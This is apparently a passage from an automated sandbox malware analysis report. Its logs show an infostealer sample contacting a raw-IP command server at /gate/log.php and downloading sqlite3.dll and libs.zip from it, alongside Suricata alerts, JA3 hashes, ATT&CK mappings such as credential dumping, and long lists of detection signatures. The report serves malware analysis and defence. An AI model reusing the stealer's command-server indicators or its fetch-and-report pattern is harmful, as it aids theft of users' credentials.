User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.3)
Host: 35.223.217.188
Connection: Keep-Alive

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-30 13:54:47.788 192.168.1.6 [VT] 49185 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-30 13:54:55.648 192.168.1.6 [VT] 49190 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-30 13:54:57.275 192.168.1.6 [VT] 49191 104.81.141.127 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-30 13:54:59.464 192.168.1.6 [VT] 49192 104.81.141.127 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-30 13:55:02.274 192.168.1.6 [VT] 49196 195.201.225.248 [VT] 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-30 13:55:10.781 192.168.1.6 [VT] 49198 35.223.217.188 [VT] 80 TCP 1 2027250 4 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic 2
2020-06-30 13:55:10.781 35.223.217.188 [VT] 80 192.168.1.6 [VT] 49198 TCP 1 2022050 3 ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected 1
2020-06-30 13:55:10.946 35.223.217.188 [VT] 80 192.168.1.6 [VT] 49198 TCP 1 2018959 4 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation 1
2020-06-30 13:55:10.946 35.223.217.188 [VT] 80 192.168.1.6 [VT] 49198 TCP 1 2022051 2 ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected 1
2020-06-30 13:55:10.946 35.223.217.188 [VT] 80 192.168.1.6 [VT] 49198 TCP 1 2022053 2 ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected 1
2020-06-30 13:57:19.778 192.168.1.6 [VT] 49207 35.223.217.188 [VT] 80 TCP 1 2027262 4 ET INFO Dotted Quad Host ZIP Request Potentially Bad Traffic 2

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-30 13:54:23.632 192.168.1.6 [VT] 49180 20.36.252.129 [VT] 443 CN=g.msn.com 84:07:33:ed:86:d5:52:e5:ff:20:cd:89:1e:0a:3c:00:7b:68:0d:17 TLS 1.2
2020-06-30 13:54:45.159 192.168.1.6 [VT] 49184 104.81.141.127 [VT] 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLS 1.2
2020-06-30 13:54:47.788 192.168.1.6 [VT] 49185 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-30 13:54:55.780 192.168.1.6 [VT] 49190 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-30 13:54:57.396 192.168.1.6 [VT] 49191 104.81.141.127 [VT] 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLSv1
2020-06-30 13:54:59.471 192.168.1.6 [VT] 49192 104.81.141.127 [VT] 443 TLSv1
2020-06-30 13:55:02.274 192.168.1.6 [VT] 49196 195.201.225.248 [VT] 443 CN=telecut.in 67:be:dd:5e:d3:63:e9:f4:1b:ba:f6:3e:e3:b4:54:4c:3e:07:53:ad TLSv1
2020-06-30 13:56:35.343 192.168.1.6 [VT] 49205 52.114.76.37 [VT] 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-30 13:54:33.593 192.168.1.6 [VT] 49181 2.21.7.89 [VT] 80 200 ctldl.windowsupdate.com [VT] /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c05362e6e894290d application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 6894
2020-06-30 13:54:40.862 192.168.1.6 [VT] 49182 93.184.220.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-30 13:54:46.381 192.168.1.6 [VT] 49181 2.21.7.89 [VT] 80 304 ctldl.windowsupdate.com [VT] /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a5d47e2386d9bd56 application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 0
2020-06-30 13:54:46.732 192.168.1.6 [VT] 49182 93.184.220.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-30 13:55:10.077 192.168.1.6 [VT] 49197 35.223.217.188 [VT] 80 200 35.223.217.188 [VT] /gate/log.php application/json None None 578
2020-06-30 13:55:12.478 192.168.1.6 [VT] 49198 35.223.217.188 [VT] 80 200 35.223.217.188 [VT] /gate/sqlite3.dll application/octet-stream Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.3) None 916735
2020-06-30 13:56:36.464 192.168.1.6 [VT] 49206 93.184.220.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-30 13:57:28.335 192.168.1.6 [VT] 49207 35.223.217.188 [VT] 80 200 35.223.217.188 [VT] /gate/libs.zip application/zip Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.3) None 2828315
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.6 49184 104.81.141.127 443 d124ae14809abde3528a479fe01a12bd unknown
192.168.1.6 49191 104.81.141.127 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49192 104.81.141.127 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49185 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49190 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49196 195.201.225.248 telete.in 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49180 20.36.252.129 443 d124ae14809abde3528a479fe01a12bd unknown
192.168.1.6 49205 52.114.76.37 443 d124ae14809abde3528a479fe01a12bd unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
JSON Report Download
Defense Evasion Credential Access Collection Discovery
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1112 - Modify Registry
    • Signature - modifies_certs
  • T1045 - Software Packing
    • Signature - packer_entropy
  • T1003 - Credential Dumping
    • Signature - infostealer_browser
  • T1081 - Credentials in Files
    • Signature - infostealer_browser
  • T1005 - Data from Local System
    • Signature - infostealer_browser
  • T1012 - Query Registry
    • Signature - recon_programs
  • T1082 - System Information Discovery
    • Signature - recon_programs

    Processing ( 32.527 seconds )

    • 13.078 BehaviorAnalysis
    • 12.366 NetworkAnalysis
    • 5.318 Suricata
    • 0.82 Static
    • 0.299 VirusTotal
    • 0.244 CAPE
    • 0.232 peid
    • 0.069 AnalysisInfo
    • 0.036 TargetInfo
    • 0.034 Deduplicate
    • 0.016 Dropped
    • 0.01 Strings
    • 0.005 Debug

    Signatures ( 2.107999999999996 seconds )

    • 0.548 antiav_detectreg
    • 0.181 infostealer_ftp
    • 0.176 territorial_disputes_sigs
    • 0.134 infostealer_im
    • 0.113 antianalysis_detectreg
    • 0.06 antivm_vbox_keys
    • 0.059 masquerade_process_name
    • 0.041 antiav_detectfile
    • 0.039 antivm_vmware_keys
    • 0.036 infostealer_mail
    • 0.031 antivm_parallels_keys
    • 0.027 stealth_timeout
    • 0.027 antivm_xen_keys
    • 0.025 api_spamming
    • 0.025 ransomware_files
    • 0.023 antidbg_windows
    • 0.023 decoy_document
    • 0.023 infostealer_bitcoin
    • 0.019 antianalysis_detectfile
    • 0.019 antivm_generic_diskreg
    • 0.018 antivm_vpc_keys
    • 0.017 NewtWire Behavior
    • 0.017 antivm_vbox_files
    • 0.016 geodo_banking_trojan
    • 0.013 qulab_files
    • 0.013 ransomware_extensions
    • 0.012 antivm_generic_disk
    • 0.012 antivm_generic_scsi
    • 0.012 infostealer_browser
    • 0.012 Raccoon Behavior
    • 0.012 predatorthethief_files
    • 0.011 sets_autoconfig_url
    • 0.011 virus
    • 0.01 Doppelganging
    • 0.01 bootkit
    • 0.01 mimics_filetime
    • 0.01 reads_self
    • 0.009 guloader_apis
    • 0.009 antivm_xen_keys
    • 0.009 antivm_hyperv_keys
    • 0.009 bypass_firewall
    • 0.008 stealth_file
    • 0.007 betabot_behavior
    • 0.007 kibex_behavior
    • 0.007 recon_programs
    • 0.006 antivm_generic_services
    • 0.006 antidbg_devices
    • 0.006 antivm_vmware_files
    • 0.005 antiemu_wine_func
    • 0.005 persistence_autorun
    • 0.005 ransomware_message
    • 0.005 securityxploded_modules
    • 0.005 shifu_behavior
    • 0.005 antivm_generic_bios
    • 0.005 antivm_generic_system
    • 0.005 ketrican_regkeys
    • 0.005 darkcomet_regkeys
    • 0.005 limerat_regkeys
    • 0.004 dynamic_function_loading
    • 0.004 hancitor_behavior
    • 0.004 infostealer_browser_password
    • 0.004 network_tor
    • 0.004 blackrat_registry_keys
    • 0.004 OrcusRAT Behavior
    • 0.004 network_cnc_http
    • 0.003 exec_crash
    • 0.003 ipc_namedpipe
    • 0.003 kovter_behavior
    • 0.003 malicious_dynamic_function_loading
    • 0.003 antivm_vbox_devices
    • 0.003 modify_proxy
    • 0.003 browser_security
    • 0.003 masslogger_files
    • 0.003 recon_fingerprint
    • 0.003 remcos_regkeys
    • 0.002 EvilGrab
    • 0.002 uac_bypass_cmstp
    • 0.002 uac_bypass_eventvwr
    • 0.002 disables_spdy
    • 0.002 disables_wfp
    • 0.002 encrypted_ioc
    • 0.002 hawkeye_behavior
    • 0.002 kazybot_behavior
    • 0.002 nemty_note
    • 0.002 tinba_behavior
    • 0.002 codelux_behavior
    • 0.002 disables_browser_warn
    • 0.002 network_torgateway
    • 0.002 medusalocker_regkeys
    • 0.002 obliquerat_files
    • 0.002 rat_pcclient
    • 0.002 warzonerat_regkeys
    • 0.002 sniffer_winpcap
    • 0.001 InjectionCreateRemoteThread
    • 0.001 InjectionSetWindowLong
    • 0.001 antiav_avast_libs
    • 0.001 antivm_vbox_libs
    • 0.001 cerber_behavior
    • 0.001 dotnet_code_compile
    • 0.001 dridex_behavior
    • 0.001 exploit_getbasekerneladdress
    • 0.001 exploit_gethaldispatchtable
    • 0.001 koadic_apis
    • 0.001 injection_createremotethread
    • 0.001 office_postscript
    • 0.001 office_write_exe
    • 0.001 rat_nanocore
    • 0.001 antisandbox_cuckoo_files
    • 0.001 antisandbox_fortinet_files
    • 0.001 antisandbox_joe_anubis_files
    • 0.001 antisandbox_sunbelt_files
    • 0.001 antisandbox_threattrack_files
    • 0.001 antivm_vpc_files
    • 0.001 banker_cridex
    • 0.001 browser_addon
    • 0.001 azorult_mutexes
    • 0.001 network_dns_opennic
    • 0.001 network_http
    • 0.001 network_tor_service
    • 0.001 office_perfkey
    • 0.001 packer_armadillo_regkey
    • 0.001 nemty_regkeys
    • 0.001 revil_mutexes
    • 0.001 dcrat_files
    • 0.001 modirat_bheavior
    • 0.001 warzonerat_files
    • 0.001 remcos_files
    • 0.001 tampers_etw
    • 0.001 targeted_flame

    Reporting ( 200.63799999999998 seconds )

    • 191.07 PCAP2CERT
    • 6.374 BinGraph
    • 3.039 JsonDump
    • 0.112 SubmitCAPE
    • 0.043 MITRE_TTPS